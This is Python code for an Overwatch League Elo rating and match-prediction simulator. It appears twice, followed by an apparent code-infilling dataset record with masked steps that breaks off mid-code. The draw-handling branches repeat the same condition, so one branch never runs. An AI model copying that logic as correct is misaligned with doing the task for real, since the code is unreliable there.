standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / 
(map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 
elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. 
""" types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. 
getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> import json, requests, math, random #import datagatherer # Constants: start_elo = 0 # Starting elo decay_factor = 0.9 # Decay % between stages k = 30 # k for elo change d = 200 # Difference in elo for 75% expected WR overall_weight = 0.60 # Weigts for different types of elos maptype_weight = 0.20 mapname_weight = 0.20 teams = ['ATL','BOS','CDH','DAL','FLA','GZC','HZS','HOU','LDN','GLA','VAL','NYE','PAR','PHI','SFS','SEO','SHD','TOR','VAN','WAS'] maptypes = ['control','assault','hybrid','escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 
'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang','ilios','busan','horizon-lunar-colony','temple-of-anubis','hanamura','numbani','eichenwalde', 'kings-row','dorado','gibraltar','rialto'] colorrequests = requests.get("https://api.overwatchleague.com/teams",timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']]=["#"+c['primaryColor'],"#"+c['secondaryColor']] self.matchdata = json.loads(open("data.json",'r').read()) self.overall_elos = {t:start_elo for t in teams} self.maptype_elos = {t:{m:start_elo for m in maptypes} for t in teams} self.mapname_elos = {t:{m:start_elo for m in mapnames} for t in teams} self.elorecords = {t:[[],[],[],[]] for t in teams} self.stage4played = {t:0 for t in teams} self.map_draws = {m:[0,0] for m in mapnames} self.standings = {t:{'w':0,'l':0,'d':0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t:season.overall_elos[t] for t in teams} self.maptype_elos = {t:{m:season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t:{m:season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m:[season.map_draws[m][0],season.map_draws[m][1]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t:{'w':season.standings[t]['w'],'l':season.standings[t]['l'],'d':season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t]*=decay_factor for m in mapnames: self.mapname_elos[t][m]*=decay_factor for m in maptypes: self.maptype_elos[t][m]*=decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in stage['regular']+stage['playoffs']: if not match['completed']: continue t1, t2 = 
match['t1'], match['t2'] if i==3: self.stage4played[t1]+=1 self.stage4played[t2]+=1 # Season Standing W/L if match in stage['regular']: if len([x for x in match['maps'] if x['result']=='t1'])>len([x for x in match['maps'] if x['result']=='t2']): self.standings[t1]['w']+=1 self.standings[t2]['l']+=1 else: self.standings[t1]['l']+=1 self.standings[t2]['w']+=1 for map in match['maps']: t1_elo = (self.overall_elos[t1]*overall_weight + self.mapname_elos[t1][map['mapname']]*mapname_weight + self.maptype_elos[t1][map['maptype']]*maptype_weight) t2_elo = (self.overall_elos[t2]*overall_weight + self.mapname_elos[t2][map['mapname']]*mapname_weight + self.maptype_elos[t2][map['maptype']]*maptype_weight) exp_t1 = 1/(1+10**((t2_elo-t1_elo)/d)) # Expected Scores exp_t2 = 1/(1+10**((t1_elo-t2_elo)/d)) act_t1 = 1 if map['result']=='t1' else 0 if map['result']=='t2' else 0.5 # Actual Scores act_t2 = 1 if map['result']=='t2' else 0 if map['result']=='t1' else 0.5 self.map_draws[map['mapname']][0] += 1 if act_t1==0.5 else 0 # Draw % self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d']+= 1 if map['result']=='t1' else -1 if map['result']=='t2' else 0 # Standings Differential self.standings[t2]['d']+= 1 if map['result']=='t2' else -1 if map['result']=='t1' else 0 MoV = 1 # Margin of Victory elo_dif = 0 # Elo Difference if act_t1==1: # The team that won determines the margin of victory MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1) elo_dif = t1_elo-t2_elo elif act_t2==1: MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1) elo_dif = t2_elo-t1_elo else: # In case of a draw, the team with higher elo determines margin of "victory" if t1_elo>t2_elo: MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1) elo_dif = t1_elo-t2_elo elif t1_elo>t2_elo: MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1) elo_dif = t2_elo-t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change 
= k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map["maptype"]] += t1_change self.mapname_elos[t1][map["mapname"]] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map["maptype"]] += t2_change self.mapname_elos[t2][map["mapname"]] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self,name): types = { **dict.fromkeys(['hanamura','horizon-lunar-colony','temple-of-anubis','volskaya','paris'],'assault'), **dict.fromkeys(['dorado','junkertown','rialto','route-66','gibraltar','Havana'],'escort'), **dict.fromkeys(['blizzard-world','eichenwalde','hollywood','kings-row','numbani'],'hybrid'), **dict.fromkeys(['busan','ilios','lijiang','nepal','oasis'],'control') } return types[name] def predictMatch(self,team1, team2, maps, loops = 10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType,maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0]/self.map_draws[maps[i]][1] elo1 = (self.overall_elos[team1]*overall_weight + self.mapname_elos[team1][maps[i]]*mapname_weight + self.maptype_elos[team1][maptypes[i]]*maptype_weight) elo2 = (self.overall_elos[team2]*overall_weight + self.mapname_elos[team2][maps[i]]*mapname_weight + self.maptype_elos[team2][maptypes[i]]*maptype_weight) random_roll = random.random() team1winchance = 1/(1+10**((elo2-elo1)/d)) #drawchance *= min(team1winchance,1-team1winchance)*2 if random_roll < team1winchance - drawchance/2: team1score +=1 elif random_roll < team1winchance + drawchance/2: pass else: team2score +=1 if team1score==team2score: map5 = random.choice([m for m in ['ilios','busan','lijiang'] if m not in maps]) elo1 = (self.overall_elos[team1]*overall_weight + self.maptype_elos[team1]['control']*maptype_weight + self.mapname_elos[team1][map5]*mapname_weight) elo2 = (self.overall_elos[team2]*overall_weight + 
self.maptype_elos[team2]['control']*maptype_weight + self.mapname_elos[team2][map5]*mapname_weight) if random.random()< 1/(1+10**((elo2-elo1)/d)): team1score+=1 else: team2score +=1 scoreline = "{}-{}".format(team1score,team2score) if scoreline not in results: results[scoreline]=0 results[scoreline]+=1 if team1score>team2score: team1wins += 1 results = {s:results[s]/loops for s in results} return results, team1wins/loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): ''' Type can be regular, or playoffs. It is assumed team1 is the higher seed. ''' types = [self.getMapType(m) for m in maps] score = [0,0] def simulateMap(mapname,maptype): elo1 = (self.overall_elos[team1]*overall_weight + self.mapname_elos[team1][mapname]*mapname_weight + self.maptype_elos[team1][maptype]*maptype_weight) elo2 = (self.overall_elos[team2]*overall_weight + self.mapname_elos[team2][mapname]*mapname_weight + self.maptype_elos[team2][maptype]*maptype_weight) random_roll = random.random() team1winchance = 1/(1+10**((elo2-elo1)/d)) drawchance = self.map_draws[mapname][0]/self.map_draws[mapname][1] * min(team1winchance,1-team1winchance)*2 if random_roll < team1winchance - drawchance/2: act_t1, act_t2 = 1,0 elif random_roll < team1winchance + drawchance/2: act_t1, act_t2 = 0.5,0.5 else: act_t1, act_t2 = 0,1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1/(1+10**((elo2-elo1)/d)) # Expected Scores exp_t2 = 1/(1+10**((elo1-elo2)/d)) if act_t1==1: elo_dif = elo1-elo2 elif act_t2==1: elo_dif = elo2-elo1 else: if elo1>elo2: elo_dif = elo1-elo2 elif elo1>elo2: elo_dif = elo2-elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] 
+= t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1),round(act_t2) if type=='regular': for i in range(len(maps)): score1,score2 = simulateMap(maps[i],types[i]) score[0]+=score1 score[1]+=score2 if score[0]==score[1]: map5 = random.choice([x for x in mapnames if self.getMapType(x)=='control' and x not in maps]) score1,score2 = simulateMap(map5,'control') score[0]+=score1 score[1]+=score2 if score[0]>score[1]: self.standings[team1]['w']+=1 self.standings[team2]['l']+=1 else: self.standings[team1]['l']+=1 self.standings[team2]['w']+=1 self.standings[team1]['d']+=score[0]-score[1] self.standings[team2]['d']+=score[1]-score[0] if type=='playoffs': mappreferences = {t:{mt:[x for x in postseasonmappool if self.getMapType(x)==mt] for mt in maptypes} for t in [team1,team2]} for t in [team1,team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x:self.mapname_elos[t][x]-self.mapname_elos[{team1:team2,team2:team1}[t]][x],reverse=True) mapprogression = ['control','hybrid','assault','escort'] scores = [0,0] mnum = 0 played = [] picker = team1 while max(score)<firstto: mtype = mapprogression[mnum%4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1,score2 = simulateMap(mname,mtype) if score1==1: picker=team2 score[0]+=1 elif score2==1: picker=team1 score[1]+=1 if score[0]>score[1]: return [team1,team2] else: return [team2,team1] return
flexible
{ "blob_id": "4f84cf80292e2764ca3e4da79858058850646527", "index": 8862, "step-1": "<mask token>\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n 
self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n 
self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n <mask token>\n <mask token>\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n 
self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-2": "<mask token>\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + 
c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n 
for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n 